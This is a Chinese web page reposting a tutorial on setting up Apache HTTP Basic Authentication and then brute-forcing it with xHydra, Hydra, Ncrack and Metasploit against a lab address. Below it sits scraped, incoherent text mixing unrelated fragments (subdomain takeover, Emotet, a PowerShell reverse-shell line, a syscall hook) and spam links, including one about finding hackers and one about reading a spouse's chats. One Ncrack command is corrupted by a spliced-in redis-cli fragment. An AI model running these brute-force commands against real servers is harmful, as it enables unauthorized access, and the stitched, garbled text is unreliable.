黑客技术渠道:多种测验HTTP身份验证的办法

访客5年前黑客资讯993

在这篇文章中,我们会告知我们怎么维护Apache Web服务器免受未经身份验证的用户不合法拜访,以及怎么躲藏要害中心信息不被不合法用户

查看到。当然了,我们还会介绍怎么运用这些安全缺点来浸透方针服务器,信任这也是我们十分感兴趣的东西。

HTTP基础认证(BA)

在HTTP事务处理环境中,基础拜访身份认证是HTTP用户署理在央求供给用户名和暗码时需求运用到的一种安全办法。

实际上,HTTP基础认证(BA)是完成对Web资源拜访控制的一种最简略的技能,由于它不需求规划cookie、会话辨认符或登录页面,HTTP基础认证是需求运用到HTTP头中的规范字段,并且还不需求进行握手。

可是,BA机制不会为凭据的传输供给机密性维护。它只会在传输过程中对相关信息进行Base64编码,而不会选用任何方式的加密。因而,HTTPS一般需求结合BA一同运用。

试验环境建立

1、 Apache服务器(Ubuntu 14.04)

2、 浸透检验设备(Kali Linux)

3、 设置暗码认证

4、 设备Apache有用东西包

运用下列指令设备Apache2有用包:

sudo apt-get install apache2 apache2-utils

创建暗码文件

运用htpasswd指令创建暗码文件,Apache将会用它来验证用户身份:

 

sudo htpasswd -c /etc/apache2/.htpasswd raj

cat /etc/apache2/.htpasswd

gedit etc/apache2/sites-enabled/000-default.conf

 

在虚拟主机设置中装备拜访控制

将下列装备内容保存到000-default.conf文件中:

<Directory "/var/www/html">

       AuthType Basic

       AuthName "Restricted Content"

       AuthUserFile /etc/apache2/.htpasswd

       Require valid-user

</Directory>

运用.htaccess文件装备拜访控制

翻开Apache装备文件,批改.htaccess文件来启用暗码维护,添加下列代码:

sudo gedit /etc/apache2/apache2.conf

ServerName localhost

将AllowOverride参数批改为“All”,保存并重启Apache服务:

<Directory /var/www/>

   Options Indexes FollowSymLinks

   AllowOverride All

   Require all granted

</Directory>

现在,我们需求往受限目录中添加一个.htaccess文件。这儿我们给整个网站添加约束,当然了,你也能够约束独自目录:

sudo nano /var/www/html/.htaccess

AuthType Basic

AuthName "Restricted Content"

AuthUserFile /etc/apache2/.htpasswd

Require valid-user

sudo service apache2 restart

承认暗码认证

在浏览器中检验拜访受限资源,承认你的内容已受维护。这儿会弹出如下所示的验证框:

假如你拜访的内容没有弹出认证窗,或许你取消了认证页面,那你将会看到401未授权拜访过错。

输入正确的用户名和暗码之后,你就应该能够拜访网站内容了:

运用HTTP认证缝隙xHydra

这是一款通过FTP端口和字典侵犯侵略系统的图形化东西,在Kali中翻开xHydra,选择“Single Target option”,设置方针IP,其他按下图勾选:

Passwords标签页装备如下,装备好字典文件:

切换到Start标签,点击“Start”,能够看到字典侵犯的进展以及终究的成果:

Hydra

Hydra能够针对50种协议进行快速的字典侵犯,其间包含telnet、ftp、http、https、 *** b以及多种502BD7662A553397BBDCFA27B585D740A20C49FC数据库。操作指令如下:

hydra -L user.txt -P pass.txt 192.168.0.105 http-get

Ncrack

Ncrack是一款高速 *** 认证破解东西,它能够协助企业检验 *** 安全状况,并辨认弱暗码。操作指令如下:

ncrack -U user.txt登录redis并批改其装备 redis-cli -h 192.168.192.133 -P pass.txt http://192.168.0.105

Metasploit

下面这个模块能够对HTTP认证服务进行侵犯,翻开Kali终端,输入“msfconsole”,然后输入下列指令:

use auxiliary/scanner/http/http_login

msf auxiliary(scanner/http/http_login) > set user_file  user.txt

msf auxiliary(scanner/http/http_login) > set pass_file  pass.txt

msf auxiliary(scanner/http/http_login) > set rhosts 192.168.0.105

msf auxiliary(scanner/http/http_login) >  set stop_on_success

msf auxiliary(scanner/http/http_login) > exploit

跋文

期望这篇文章的内容能够协助我们了解HTTP弱装备的安全风险,并协助我们更好地提高自己网站的安全性。

 

* 参阅来历:hackingarticles,FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM

黑客技术渠道:多种测验HTTP身份验证的办法

研究人员通过CNMAE域名记载接收了子域,并将一切到主机的央求到非注册的Azure的子域。通过一个一般的Azure账户,就能够注册一个子域并添加对应的主机名(host name)。这样就能够控制主机上的内容。2) 云控作业部分 :多种测试HTTP身份验证的 ***

黑客技术平台创建检验项目后,下一步是设置代码签名证书。首要,翻开Xcode首选项,然后选择“Accounts”。要添加Apple ID帐户,请单击左下角的加号并登录你的帐户。然后单击右下角的“Manage Certificates”。5. 通过在保存ADB和Fastboot二进制文件的同一目录中翻开指令提示符/Power Shell/Terminal,并根据你其时的操作系统输入以下指令,保证你的PC能够正常辨认你的Pixel 3手机:最近,在出名的Emotet银行木马中发现了一个生动的活动,它运用了免费系统东西但目的不明。 US-CERT本年(2018年)发布了针对这个特定版其他Emotet的警报,提到其运用了NirSoft Password-Recovery东西。手动删去此文件会在 5 秒钟后重现生成出现。

由于大多数Linux操作系统都设备了netcat,是以能够或许将提权后的敕令提高为root shell。根除结束后终究还得copy或许重装正常的系统指令。2.有缝隙的IoT装备黑客技术平台

控制端实行:9.6.3

4. SQL注入

在侵犯机器中设备好python 2.6.6和pywin32,并设置好python的环境变量,以便我们在cmd中运用。该研讨团队的Siamak Shahandashti博士标明:“这就好比是在玩拼图相同,你所得到的信息越多,你就能够越快拼出无缺的图。”$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)

多种测试HTTP身份验证的 ***

黑客技术平台-trigger 标明主题中你想用来触发规则的指令action = iptables[name=SSH, port=ssh, protocol=tcp] #动作的相关参数,对应action.d/iptables.conf文件

斐讯K1之所以能免费,有两大“秘籍”。一是附赠的铃铛卡,第二个是关键,待会再说。

声明:本文仅仅是入门和基础,你需求根据自己的需求来扩展。

sys_call_table[__NR_mkdir] = fake_mkdir;黑客技术平台

正如你所了解的那样,USB交互设备和USB存储器这两大类USB设备是现在我们运用最为广泛的。

公有云运维安全四大风险第四步:多种测试HTTP身份验证的 ***

"id": redacted,这儿我现已知道了机器的IP地址,不过由于network::arp Brik的存在你能够通过在vboxnet0接口上进行ARP扫描来获得IP地址。7、我国#Blockip/net(subnet)
本文标题:黑客技术渠道:多种测验HTTP身份验证的办法

相关文章

查找老婆和其他女人聊天记录

. 现在很多疾病都可以通过提前接种疫苗来预防,但是很多家长也担心一起接种疫苗对小孩身体有影响,那么流感疫苗和肺炎疫苗可以一起打吗 小孩流感疫苗和肺炎疫苗能同时打吗。下面友谊长存的小编就来为大家介绍。...

抖音赞多了有钱拿吗(抖音点赞1.8元一单)

抖音赞多了有钱拿吗(抖音点赞1.8元一单)

我今天在这里,不是要反驳谁。关于抖音点赞,我目前在测试,效果不错,且相当稳定。 我先来谈谈我的分析,抖音点赞,是伴随着抖音的崛起,应运而生的,目前抖音火遍了全球。几十亿的用户,是什么概念?就连美国政府...

安肤化妆品好不好用(安肤堂产品价格表图片)

安肤化妆品好不好用(安肤堂产品价格表图片)

果酸一一洁面嫩肤 果酸是新鲜水果的提取物,广泛用于洗面奶以及保湿成分中,其嫩肤作用强大。低浓度10%的果酸不仅能加强皮肤保湿,也能去除老化角质,改善肌肤粗糙和暗沉,令皮肤重现光泽。但因果酸成分会...

网络黑客去哪里找(网络黑客找人网站)

一、网络黑客去哪里找(网络黑客找人网站) 1、网络黑客在哪找网络黑客在贴吧上应该可以找得到。 JargonFile中对“黑客”一词给出了很多个定义,大部分定义都涉及高超的编程技术,网上黑客怎么找可以...

《庆余年》付费超前点播惹怒网友 腾讯视频:我们不够体贴

《庆余年》付费超前点播惹怒网友 腾讯视频:我们不够体贴

12月17日消息,针对腾讯视频近日因网剧《庆余年》上线超前点播的新模式而受到争议,腾讯视频总编辑王娟做出回应。 在三声2019第四届中国新文娱·新消费年度峰会上,腾讯视频副总裁王娟回应称,“(...

黑客顧擁,快3黑客软件,国外出名的黑客网站

· 区块链创业公司AriseBank的首席执行官(CEO)因涉嫌欺诈投资者400万美元被FBI拘捕,将面对120年拘禁。 跟着网络技术的高速开展和遍及,国家、企业和个人面对的信息安全要挟日趋严峻,国际...